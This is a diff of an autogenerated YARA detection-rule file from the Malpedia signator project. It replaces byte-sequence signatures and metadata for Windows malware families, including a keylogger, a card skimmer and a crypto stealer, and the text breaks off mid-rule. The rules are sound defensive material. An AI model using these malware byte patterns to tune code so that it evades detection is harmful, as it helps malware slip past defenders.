"https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tigerlite_auto.yar#L1-L169" license_url = "N/A" - logic_hash = "d74e9ef23a0b946252054fc1985382779e2408df3e68ecb0420a27d04cacd609" + logic_hash = "fcf8f4ae129308f814ca77b619fbfadd3ec5da4949cb79481c9fac330ba09f68" score = 75 quality = 75 tags = "FILE" @@ -142600,32 +145441,38 @@ rule MALPEDIA_Win_Keylogger_Apt3_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8be8 8d442458 50 55 57 } - $sequence_1 = { 3bf3 7523 68???????? ff15???????? 5f } - $sequence_2 = { 8b35???????? 8d6b08 55 50 ffd6 } - $sequence_3 = { 7453 53 8b5c240c 55 56 8b35???????? 8d6b08 } - $sequence_4 = { 89442420 3bf8 7216 5b 5f } - $sequence_5 = { ffd6 50 ffd7 ffd3 89442420 83f8ff 7551 } - $sequence_6 = { 0fb69695010000 50 0fb68694010000 51 52 50 } - $sequence_7 = { 84c0 75f8 2be9 8d5501 52 } - $sequence_8 = { e8???????? 68???????? 68???????? 8d4d7c e8???????? 8b45dc } - $sequence_9 = { c7442434d8174300 ffd6 8d542404 52 89442434 } + $sequence_0 = { c1f805 83e71f c1e706 8b0485489d4100 83c00c 03c7 50 } + $sequence_1 = { 8b85e0f7ffff 85c0 751d 56 ff15???????? b832000000 5f } + $sequence_2 = { 8b8d24e5ffff 50 8b8528e5ffff 8b0485489d4100 } + $sequence_3 = { 85c0 740d ff15???????? b8c8000000 eb65 } + $sequence_4 = { ff15???????? cc 4c8d4510 488d15bbc80100 } + $sequence_5 = { 41b8ff030000 c6859000000000 e8???????? 488d1528bc0100 488d8d90000000 e8???????? } + $sequence_6 = { 33c0 8bbdbcfdffff 0fbebcc7f8214100 8bc7 89bdbcfdffff 8bbde4fdffff } + $sequence_7 = { 668986b8000000 668986be010000 c7466878874100 83a6b803000000 6a0d e8???????? } + $sequence_8 = { 4863c2 4803d8 eb61 4b8b84ea604a0200 42f644300848 743e 48ffc3 } + $sequence_9 = { 663955d8 7442 668933 8a45d8 4b8b8cea604a0200 4288443109 } + $sequence_10 = { 8b3495489d4100 8a441e04 84c0 0f8957020000 } + $sequence_11 = { 488bcb 488bf8 e8???????? 4885ff 0f8405040000 4c8d4530 488d0da1a40100 } + $sequence_12 = { 488d4c2440 418bd6 e8???????? e9???????? } + $sequence_13 = { b9e5000000 8bd8 83e303 e8???????? } + $sequence_14 = { 3bfa 7556 8bcb e8???????? 53 } + $sequence_15 = { 8d0c00 894dec eb38 8b45f4 8b0485489d4100 } condition: - 7 of them and filesize <761856 + 7 of them and filesize <349184 } -rule MALPEDIA_Win_Gopuram_Auto : FILE +rule MALPEDIA_Win_Mikoponi_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "886a3e56-99e6-5544-870d-cee2f3bf23a6" + id = "e1f9d663-47fc-536a-afed-a18f76559a32" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gopuram" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gopuram_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mikoponi" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mikoponi_auto.yar#L1-L105" license_url = "N/A" - logic_hash = "4e587acafeaded148024e517c8ecf7276743814969e25e84b3cedf8d114b44f9" + logic_hash = "e53726bff6b275a8cbfe6479d201a659d381061025ff16663204532183241afc" score = 75 quality = 75 tags = "FILE" @@ -142639,32 +145486,30 @@ rule MALPEDIA_Win_Gopuram_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 48894308 4885c0 7412 418d562f 488bc8 e8???????? } - $sequence_1 = { 448bfb 48895dc7 8bcb 48895d9f 48895db7 48895d97 48895da7 } - $sequence_2 = { 8bc1 83e010 c1e804 898508010000 f6c104 7507 f6c108 } - $sequence_3 = { e8???????? eb21 c7442420210e0480 41b99e100000 4c8d05938b0600 8bd7 488bce } - $sequence_4 = { ff05???????? b801000000 4883c428 c3 ff0d???????? 751a 488b0d???????? } - $sequence_5 = { e9???????? 488b0d???????? 488b01 ff90f8000000 83f805 0f84e1fdffff 488b0d???????? } - $sequence_6 = { 66094354 8b8597000000 83c0fc 83f801 0f8755010000 488b742448 418bf9 } - $sequence_7 = { 89543104 488d051c8b0300 48898698040000 4889aea0040000 4889aea8040000 4889aeb0040000 488d8eb8040000 } - $sequence_8 = { 890d???????? c705????????09000380 8bcf 488d05ce350900 6690 3b70fc 7508 } - $sequence_9 = { bf01000000 e9???????? 488b0d???????? 488b01 ff90f8000000 83f805 7463 } + $sequence_0 = { 8b0f 51 e8???????? 83c404 5d 5f 83c408 } + $sequence_1 = { e8???????? 83c404 eb15 8d942464020000 52 8d442418 } + $sequence_2 = { 33ed 391d???????? 743d bf???????? } + $sequence_3 = { b9???????? 66895010 c7004418a150 e8???????? 8d3c47 } + $sequence_4 = { 53 55 e8???????? 83c40c 84c0 7506 83c3ff } + $sequence_5 = { 803d????????01 56 7527 8b742408 56 ff15???????? } + $sequence_6 = { e8???????? 81c470040000 c3 8b542430 3b542420 750e } + $sequence_7 = { 7543 3805???????? 753b 8d8c2464020000 51 68???????? } condition: - 7 of them and filesize <1591296 + 7 of them and filesize <330752 } -rule MALPEDIA_Win_Roopirs_Auto : FILE +rule MALPEDIA_Win_Darkmegi_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "57676d4c-d0d7-5b4f-80a4-819b4d474425" + id = "b4298044-373c-5ebc-af72-71a8178891f9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roopirs" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.roopirs_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darkmegi_auto.yar#L1-L114" license_url = "N/A" - logic_hash = "d4e144778ab9b98b475c3cbfeb400528a9373556893774f62bba1f2eb8f36265" + logic_hash = "594b35440f1c502a0c2d0a5e3fa86f0d3dc6b2f476ed2e839ff20aa39301e384" score = 75 quality = 75 tags = "FILE" @@ -142678,32 +145523,32 @@ rule MALPEDIA_Win_Roopirs_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c745fc47000000 8b4dd8 51 68???????? ff15???????? 8945c0 } - $sequence_1 = { 50 ff15???????? 898530ffffff eb0a c78530ffffff00000000 33c9 837da800 } - $sequence_2 = { ff15???????? 8d4db0 ff15???????? c745fc07000000 833d????????00 751c 68???????? } - $sequence_3 = { 8945b0 837db000 7d1d 6a20 68???????? 8b45dc 50 } - $sequence_4 = { 8d55d4 52 6a05 ff15???????? 83c418 8d45bc 50 } - $sequence_5 = { 8b02 8b4d80 51 ff5014 dbe2 89857cffffff } - $sequence_6 = { 8b4508 50 8b08 ff5104 8b5514 56 8d45bc } - $sequence_7 = { c78544ffffff00000000 8b45ac 89458c 8d4dcc 51 8b558c } - $sequence_8 = { 68???????? 68???????? ff15???????? c78548ffffffd4624000 eb0a } - $sequence_9 = { 8d4dc8 ff15???????? c745fc07000000 8b4dd8 51 68???????? } + $sequence_0 = { 81c43c010000 c3 8b442448 6a00 6a00 50 } + $sequence_1 = { c3 8b44244c 56 3d50450000 7411 } + $sequence_2 = { 3db7000000 7517 56 ff15???????? 56 } + $sequence_3 = { ff15???????? 83c40c 8d4c2464 8d942478050000 8d442444 } + $sequence_4 = { 8b548c2c 668b02 50 ffd5 } + $sequence_5 = { 0fb6d2 f6820196b40204 7403 40 } + $sequence_6 = { 49 6a01 8dbc0ca9030000 ffd6 6a01 } + $sequence_7 = { 81e1ffff0000 3bc1 0f8c9bfeffff 33db 8b94249e030000 } + $sequence_8 = { 52 e8???????? 83c404 8bd8 85f6 7426 } + $sequence_9 = { 33c0 5e 83c468 c21000 e8???????? } condition: - 7 of them and filesize <344064 + 7 of them and filesize <90304 } -rule MALPEDIA_Win_Turnedup_Auto : FILE +rule MALPEDIA_Win_Kuaibu8_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "317b79ff-9d3d-5ba0-8921-2dd0758e0502" + id = "91f1248d-ab2b-5079-b9e0-a51e87297924" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.turnedup_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuaibu8" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kuaibu8_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "41dd089d435e4495b4c527e58471affc57ceb5820e7069ad3a735daa64e32911" + logic_hash = "cbf2ea9a6bca6a983b840d14cd3e4818a640e713858e86101c3fa57dacf19221" score = 75 quality = 75 tags = "FILE" @@ -142717,32 +145562,32 @@ rule MALPEDIA_Win_Turnedup_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b4dfc 5f 5e 33cd 895004 5b } - $sequence_1 = { 7706 891d???????? ff0d???????? 7506 891d???????? 6a01 } - $sequence_2 = { 8b07 8b4004 03c7 33d2 8955dc c645e001 8b4838 } - $sequence_3 = { 895dfc 752b 6a00 8d4df8 e8???????? 833d????????00 } - $sequence_4 = { 68???????? 8819 e8???????? 8d7dac } - $sequence_5 = { c746180f000000 894614 56 884604 e8???????? 83c404 } - $sequence_6 = { 830801 8b4dd8 394dc0 741e 837dd000 } - $sequence_7 = { 8945bc 8975b0 8b55f4 8b45e0 83fa10 7303 8d45e0 } - $sequence_8 = { 8ad5 c0ea04 80e203 02d0 8a45f6 8855f8 8ad0 } - $sequence_9 = { 8b45bc 8a11 8810 8b0b 40 } + $sequence_0 = { 53 e8???????? 83c404 58 8945e4 8b5ddc } + $sequence_1 = { 895dc8 6a00 6a00 6a00 6804000080 } + $sequence_2 = { 52 e8???????? 83c404 8d0c2f 8bf0 8b03 } + $sequence_3 = { e9???????? 8b5dec e8???????? 8945d8 837dd803 0f8586010000 } + $sequence_4 = { ff75f4 e8???????? 83c408 83f800 0f8521000000 8b45fc 85c0 } + $sequence_5 = { 81ec30000000 c745fc00000000 8965f8 8b5d08 ff33 ff15???????? 90 } + $sequence_6 = { e8???????? 8945d4 8b5ddc 85db 7409 } + $sequence_7 = { 53 e8???????? 83c404 58 8945f4 6805000000 e8???????? } + $sequence_8 = { dd5de8 dd45e8 dc25???????? dd5de0 8b5df8 e8???????? b802000000 } + $sequence_9 = { 83c404 8803 e9???????? bd02000000 55 e8???????? 668b4e0c } condition: - 7 of them and filesize <892928 + 7 of them and filesize <737280 } -rule MALPEDIA_Win_Nachocheese_Auto : FILE +rule MALPEDIA_Win_Powerpool_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "eaa2162c-aba5-5a56-92b8-2694c1a819b5" + id = "0805ab0c-2483-51ef-91bd-613062750253" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nachocheese" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nachocheese_auto.yar#L1-L162" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerpool" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.powerpool_auto.yar#L1-L157" license_url = "N/A" - logic_hash = "65398c7b0a5280da9a71f8939ca7f529421377deec37e9f371d0deba7b01dc67" + logic_hash = "c10aba7ea9fc986a00a689a799239b370f623f0a4bcaeb12871b3235333f8df6" score = 75 quality = 75 tags = "FILE" @@ -142756,38 +145601,38 @@ rule MALPEDIA_Win_Nachocheese_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 3d9c000000 7c07 3d9f000000 7e0d 33c0 c3 05d13fffff } - $sequence_1 = { 33f6 397508 0f8ec9000000 b8???????? 48 } - $sequence_2 = { 2bfa 8d47fd 3901 8901 } - $sequence_3 = { 02ca 880c3e 8a5005 32d1 8b4dfc 88143e 8a4c0105 } - $sequence_4 = { 7305 83c303 eb1c 81fb00000100 } - $sequence_5 = { 33c8 894710 8b4708 33c1 } - $sequence_6 = { 7305 83c304 eb0f 81fb00000001 } - $sequence_7 = { 7305 83c302 eb29 81fb00010000 } - $sequence_8 = { 0f8539ffffff b8???????? 8d5001 8a08 } - $sequence_9 = { 3d2cc00000 7f18 3d2bc00000 7d1b 3d9c000000 } - $sequence_10 = { 763a b801011000 f7e6 8bc6 2bc2 d1e8 } - $sequence_11 = { 0f84bf000000 6803010000 8895f0fcffff 8d95f1fcffff 6a00 52 e8???????? } - $sequence_12 = { 50 e8???????? 8d8f0e010000 8bc1 83c430 8d5001 } - $sequence_13 = { 02ca 8b55f4 880c3e 0fb6540205 } - $sequence_14 = { 50 e8???????? b9???????? 83c424 } - $sequence_15 = { 50 6a02 51 ff15???????? 83f801 } + $sequence_0 = { 741f 90 8b4e54 8a01 } + $sequence_1 = { 7420 8b4514 8b4dfc 81c12c020000 } + $sequence_2 = { 895de8 8b5dcc 2bd8 895940 8b5dd0 } + $sequence_3 = { 005311 40 005d11 40 006711 } + $sequence_4 = { 7420 83e91d 7412 83e903 0f8515010000 c745dcfcae4400 } + $sequence_5 = { 7420 3c0a 740c 6a0a 6a01 8d4b14 } + $sequence_6 = { 741f d945b8 03c0 03c0 } + $sequence_7 = { 8b5c2410 23da c1ce0a 03f2 23ee 0bdd 035c2418 } + $sequence_8 = { 895dd0 8b7940 897dcc 3bc7 7613 } + $sequence_9 = { 7420 807de000 741a 8b4ddc } + $sequence_10 = { 006711 40 0000 0303 } + $sequence_11 = { 7420 8b4508 8b4d0c 3bc1 } + $sequence_12 = { 895ddc 895dfc 8d45e0 50 } + $sequence_13 = { 895de0 895de4 33c9 66898dd0fdffff } + $sequence_14 = { 895ddc 8b45e4 50 e8???????? } + $sequence_15 = { 744f 53 57 8bff 8bc8 } condition: - 7 of them and filesize <1064960 + 7 of them and filesize <819200 } -rule MALPEDIA_Win_Vskimmer_Auto : FILE +rule MALPEDIA_Win_Biscuit_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "fc191c93-ce90-5418-a28d-2b3fa9eb623e" + id = "cbdd41f1-3e24-52e8-913d-0c21f28eadad" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vskimmer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vskimmer_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.biscuit" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.biscuit_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "81aef2465b53cd0c0e1b48561687f8c8208fd8d87041be709dd2217d8a17703f" + logic_hash = "c4b7181ffb74601ad4f6fe9643262fda887ff950b5291eeca17cee75a1b1c812" score = 75 quality = 75 tags = "FILE" @@ -142801,32 +145646,32 @@ rule MALPEDIA_Win_Vskimmer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 3bc3 7402 8bf0 8bd6 f7da 8a07 } - $sequence_1 = { 68???????? 50 e8???????? 59 59 85c0 0f8445010000 } - $sequence_2 = { 33c0 0fbe84c188e54100 6a07 c1f804 59 } - $sequence_3 = { 75f8 ff36 e8???????? 59 8b4508 } - $sequence_4 = { 8b4508 8bf1 8b4d0c 8b7e04 } - $sequence_5 = { 5e 5b c3 8b94c110010000 8bb110020000 8b44c108 2bc6 } - $sequence_6 = { 3bd7 749c 8b8324020000 2580000000 0f95c0 0fb6c0 50 } - $sequence_7 = { 7e7b 8b460c ff36 03c7 50 } - $sequence_8 = { 7413 c685b3fdffff01 3bf3 7408 8b451c 8906 } - $sequence_9 = { 83e803 0f846a010000 48 7439 48 742d 8b4508 } + $sequence_0 = { e9???????? a1???????? 898588feffff 83bd88feffff00 0f85bb010000 bf???????? } + $sequence_1 = { 84c0 894b04 0f84e8feffff 8b542418 52 } + $sequence_2 = { 8a54040c 40 f6d2 8854040b 3bc1 } + $sequence_3 = { eb04 8b7c2424 8b4604 53 53 53 } + $sequence_4 = { e9???????? 8b4de4 bf???????? 33c0 8d9980000000 83c9ff f2ae } + $sequence_5 = { f2ae f7d1 49 3bd1 731f 8b7de0 8a0c1a } + $sequence_6 = { 740e 68???????? 57 e8???????? 83c408 f60610 } + $sequence_7 = { 899538feffff 83bd38feffff00 7511 8b85ccfeffff 2b45e4 8985c0feffff } + $sequence_8 = { c1e902 f3a5 8bc8 83e103 f3a4 68c8000000 ff15???????? } + $sequence_9 = { 8bcb e8???????? 84c0 7426 8b7b04 8bcd 8bd1 } condition: - 7 of them and filesize <376832 + 7 of them and filesize <180224 } -rule MALPEDIA_Win_Bohmini_Auto : FILE +rule MALPEDIA_Win_Magala_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c674d076-0d8a-5cd0-a61f-b74753074ae4" + id = "57b76c6b-52c3-5f25-9fd2-257d2fe2adf4" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bohmini" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bohmini_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.magala" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.magala_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "924ffc111e8f5edb5600c44b643235932f72ba9b2a992fa2571ad4dc6b3c6eb8" + logic_hash = "bd9ee6cce82c810cf18ac629b3f76ce4da7e66a1f258b71b1396e2e5be340ce0" score = 75 quality = 75 tags = "FILE" @@ -142840,32 +145685,32 @@ rule MALPEDIA_Win_Bohmini_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 896c2410 896c2414 0f86c5000000 8b7c2420 } - $sequence_1 = { 6a00 6a00 8bca 83c11a 51 6a00 6a00 } - $sequence_2 = { 8d542414 6a00 52 ff15???????? 85c0 } - $sequence_3 = { ff15???????? 3bc3 a3???????? 7512 5f 5e } - $sequence_4 = { 6800040000 50 53 ff15???????? 50 ff15???????? } - $sequence_5 = { 4a 741a 4a 7543 e8???????? 03c6 33d2 } - $sequence_6 = { 83c410 85c0 7507 6891130000 eb2a } - $sequence_7 = { 8b5608 52 ffd5 40 50 } - $sequence_8 = { 52 e8???????? 40 50 8d8424b8010000 50 } - $sequence_9 = { 8b2d???????? 8b3e 51 6a00 ffd5 50 ffd3 } + $sequence_0 = { 8b4004 838c054cffffff04 8b8538ffffff 8b4004 c6840578ffffff30 2b17 744e } + $sequence_1 = { 8b7dd0 3bdf 0f849d000000 33c0 c745e800000000 6aff 50 } + $sequence_2 = { 8bcf e8???????? 56 8bd0 c645fc0c 8d4da8 e8???????? } + $sequence_3 = { 8a55d8 c645fc00 83f810 7242 } + $sequence_4 = { e8???????? 8b4df8 83c40c 837e1410 894e10 7211 } + $sequence_5 = { 6685c0 75f4 a1???????? 8b550c } + $sequence_6 = { 6a01 50 8b08 ff513c 85c0 75b8 50 } + $sequence_7 = { 8995e0fdffff 8955fc 8b1d???????? 0f1f8000000000 } + $sequence_8 = { c745e800000000 c745ec0f000000 c645d800 e8???????? c745fc00000000 8d4e04 } + $sequence_9 = { e8???????? 8b4df8 b853d9de75 8b75f4 33db 2bce f7e9 } condition: - 7 of them and filesize <139264 + 7 of them and filesize <589824 } -rule MALPEDIA_Win_Pipcreat_Auto : FILE +rule MALPEDIA_Win_Void_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "38c9ab7f-3633-5cf9-b43a-1054dcf3eb2e" + id = "71ce776b-404f-5334-912d-5acada68aa35" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipcreat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pipcreat_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.void" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.void_auto.yar#L1-L114" license_url = "N/A" - logic_hash = "c78f35b80acd6d02ab8a3808b0a24320b25c92c8bd70c4aff6d75dba01d58da4" + logic_hash = "c9d396773d78302d4ad6bf52fbcd07db1d946f6b7dffcc9d3a1efd465ff43099" score = 75 quality = 75 tags = "FILE" @@ -142879,32 +145724,30 @@ rule MALPEDIA_Win_Pipcreat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 ffd6 85c0 751b 8d851cfeffff c7851cfeffff14010000 } - $sequence_1 = { 6a00 8d442420 6a00 50 6a01 6a02 6a20 } - $sequence_2 = { 8b4c2404 68???????? 6a01 51 ff15???????? 85c0 } - $sequence_3 = { 56 ff15???????? 85c0 741d 6a30 6868420010 } - $sequence_4 = { e9???????? 83bd20feffff04 770a 6888410010 e9???????? 83bd20feffff05 8b35???????? } - $sequence_5 = { 56 57 be9c400010 8d7df8 8d45f8 a5 50 } - $sequence_6 = { eb12 6838470010 ff15???????? 6a20 6898420010 } - $sequence_7 = { 59 8d8538ffffff 6a28 50 } - $sequence_8 = { 7426 50 50 50 8b15???????? } - $sequence_9 = { be???????? 8d7c2414 33c0 f3a5 b975000000 } + $sequence_0 = { 6a09 8d4c2410 51 50 e8???????? 85c0 7518 } + $sequence_1 = { 5d c20c00 6a00 ff750c 50 e8???????? 50 } + $sequence_2 = { 807d6b00 0f8483000000 6a02 8d4dc4 e8???????? 8d45c4 c745fc02000000 } + $sequence_3 = { 0f43c6 50 ff7514 8d45ac ff7510 50 53 } + $sequence_4 = { 5b 8bc1 8b4c2440 5e 5d 33cc e8???????? } + $sequence_5 = { 7473 8d4dec 8975ec e8???????? 53 8bcf 8b00 } + $sequence_6 = { 854110 7419 8d45e4 6a01 50 e8???????? 83c408 } + $sequence_7 = { 894610 c1e102 51 8d0490 6a00 50 e8???????? } condition: - 7 of them and filesize <65536 + 7 of them and filesize <2744320 } -rule MALPEDIA_Win_Joanap_Auto : FILE +rule MALPEDIA_Win_Snatchcrypto_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7b68fae3-26c2-54e0-a3e7-133f1581d080" + id = "8e680a41-0fdc-5ac7-bc9f-3f795f28f0bb" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.joanap_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatchcrypto" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.snatchcrypto_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "e8c4ce689f2f9423d9b3c5df5ab94aca097fbbc5a318100a67230ed53bf34f3c" + logic_hash = "276b735298fc8584b98457d3cb267661e785fa3122c696ae64ba4741a5859a9d" score = 75 quality = 75 tags = "FILE" @@ -142918,32 +145761,32 @@ rule MALPEDIA_Win_Joanap_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b8c242c010000 66c74424140200 51 c744241c7f000001 ff15???????? 8d542414 } - $sequence_1 = { 56 85c0 57 0f8483000000 53 ff15???????? 50 } - $sequence_2 = { 0f8488000000 6a04 e8???????? 8b442414 8d6b06 66897304 } - $sequence_3 = { f7d1 49 81f908020000 7332 56 ff15???????? 8bf8 } - $sequence_4 = { 750c 8d8c24b8020000 e9???????? 8d8c241b020000 51 56 ffd7 } - $sequence_5 = { 85c0 0f85cbfeffff 8b4c2410 51 ff15???????? 57 ff15???????? } - $sequence_6 = { ff15???????? 85c0 0f84cf000000 8b4c2420 51 6a01 68ff0f1f00 } - $sequence_7 = { 55 8bac2420010000 56 8b35???????? 57 33ff 8b842424010000 } - $sequence_8 = { 8b442414 83c018 47 3dd0020000 89442414 0f8c73ffffff 8b742410 } - $sequence_9 = { 0bc0 5b 81c470210000 c3 6a01 6820bf0200 8d8c2488010000 } + $sequence_0 = { 7528 488bd3 488bcf e8???????? 448b87a8020000 488d15d43f0200 448906 } + $sequence_1 = { 4c8d442430 e8???????? 85c0 0f8533010000 8d7058 8d6814 eb36 } + $sequence_2 = { ff15???????? 488bf8 4885c0 750f ff15???????? 488d15f7730200 eb27 } + $sequence_3 = { 0fb74348 ff4320 448b4b20 ffc0 488d1586a70200 440fb7c0 e8???????? } + $sequence_4 = { 48894598 4889442458 4889442460 0fb6474d 41c1e608 440bf0 0fb6474e } + $sequence_5 = { 440fb64c3580 4c8d05a73f0100 ba03000000 488bcf e8???????? 48ffc6 4883c702 } + $sequence_6 = { 4883ec38 ffca 744c 81faff1f0000 754b 33c0 4c8905???????? } + $sequence_7 = { e8???????? 8bf8 85c0 7907 b8c0feffff eb3f 0fb78394030000 } + $sequence_8 = { 83c702 3ac1 760a b8bafeffff e9???????? 7368 0fb78b94030000 } + $sequence_9 = { 488d15e98d0200 498bce 4c8bc0 e8???????? 8d7e3e 448be3 e9???????? } condition: - 7 of them and filesize <270336 + 7 of them and filesize <1400832 } -rule MALPEDIA_Win_Yarat_Auto : FILE +rule MALPEDIA_Win_Younglotus_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9b4289ae-23e7-5628-ab26-1ca831bf886f" + id = "020c6ff6-d6bb-58fb-b2fa-0c433bea2123" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yarat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.yarat_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.younglotus" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.younglotus_auto.yar#L1-L165" license_url = "N/A" - logic_hash = "6ef74e5effac24b08695314060e4e7e4519b854f50f85d73d7052d0ace49145b" + logic_hash = "b3707e8b206f95395dc2e356973108894d4afdfd30bcae58d7d87fd0cefdf956" score = 75 quality = 75 tags = "FILE" @@ -142957,34 +145800,40 @@ rule MALPEDIA_Win_Yarat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 8b75a8 8bf8 3bf7 7465 8b4e14 83f910 } - $sequence_1 = { c70000000200 e9???????? 56 68???????? 57 e8???????? 83c40c } - $sequence_2 = { 8d8544feffff 6a00 57 89864c010000 e8???????? 83c414 80bf0b05000000 } - $sequence_3 = { e8???????? 83c40c 85d2 0f8f28010000 7c08 85c0 0f831e010000 } - $sequence_4 = { 8b8f90050000 83c40c 85c9 7506 8b8f04030000 8b8748050000 8b4040 } - $sequence_5 = { 8a18 885dfe 80fb2e 8b5d08 7406 807dfe2c 7534 } - $sequence_6 = { 07 20c2 aa 709a 93 a3???????? 9e } - $sequence_7 = { 8b75fc 8bc7 c1e808 83e00f 8a80d0070a10 880433 8bda } - $sequence_8 = { e8???????? 83c408 85c0 7405 8d7728 eb38 8d85fcefffff } - $sequence_9 = { 8b4508 33f6 83f8ff 742d 8d8df4fdffff 51 50 } + $sequence_0 = { 6802000080 e8???????? 83c41c 6a01 } + $sequence_1 = { e8???????? 2b450c 50 8b4dfc } + $sequence_2 = { 8b45e0 25ff000000 e9???????? c745e401000000 8b550c } + $sequence_3 = { 50 ff15???????? 8b4dfc 8981a4000000 68???????? } + $sequence_4 = { 50 8b4d0c 81e970010000 51 } + $sequence_5 = { 83bda4faffff00 751b 68???????? 8d85a8faffff 50 ff15???????? 83c408 } + $sequence_6 = { 6804010000 6a00 8d8da8faffff 51 6a01 6a00 } + $sequence_7 = { 83c40c 8b45fc 83c00f 8945f8 6a03 } + $sequence_8 = { 56 57 68???????? ff15???????? 8945dc 68???????? } + $sequence_9 = { 50 ffd3 85c0 8945fc 0f84b7000000 } + $sequence_10 = { 68???????? ffd6 ff7508 e8???????? 8bf8 59 85ff } + $sequence_11 = { ff7508 50 e8???????? 8d430f } + $sequence_12 = { 50 8945f4 ffd6 8d4df8 } + $sequence_13 = { 6a01 53 ff15???????? 8b4de8 6a03 } + $sequence_14 = { 8945e8 ffd6 68???????? 8945ec ffd7 68???????? } + $sequence_15 = { ffd0 50 ff55f0 85c0 746f 8b450c } condition: - 7 of them and filesize <8692736 + 7 of them and filesize <106496 } -rule 